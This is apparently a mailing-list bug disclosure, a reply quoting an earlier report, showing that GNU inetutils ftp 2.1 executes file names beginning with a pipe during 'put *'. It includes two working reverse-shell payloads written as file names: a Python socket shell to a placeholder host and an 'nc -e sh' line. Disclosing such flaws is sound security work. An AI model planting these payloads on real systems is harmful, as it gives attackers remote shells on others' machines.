After some further testing, I've found that I'm still able to get a shell with the aforementioned payload even with other files in the same directory. I've also found that I can also get a shell with the following file name:
``` |nc 127.0.0.1 1337 -e sh ``` As a result, I believe code execution is caused by having a `|` (pipe) at the beginning of the file name. Also, the version information is as follows. ``` $ ftp --version ftp (GNU inetutils) 2.1 Copyright (C) 2021 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later < https://gnu.org/licenses/gpl.html>. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Written by many authors. ``` On Sun, Sep 19, 2021 at 7:04 PM John Zhau <johnzhau0xn...@gmail.com> wrote: > I've found that with a certain file name, `ftp` executes code in the file > name. The file is created with the following command > > ``` > touch "|python3 -c 'import > os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",YOUR_PORT));[os.dup2(s.fileno(),f)for > f in(0,1,2)];pty.spawn(\"sh\")';echo .csv" > ``` > > To get code to execute, simply have the file in the current directory > (haven't tested with multiple files in the directory) and run `put *` to > upload everything. > > This bug was found while I was doing a CTF (capture the flag) challenge > and I haven't been able to connect to the same server since for further > testing. >
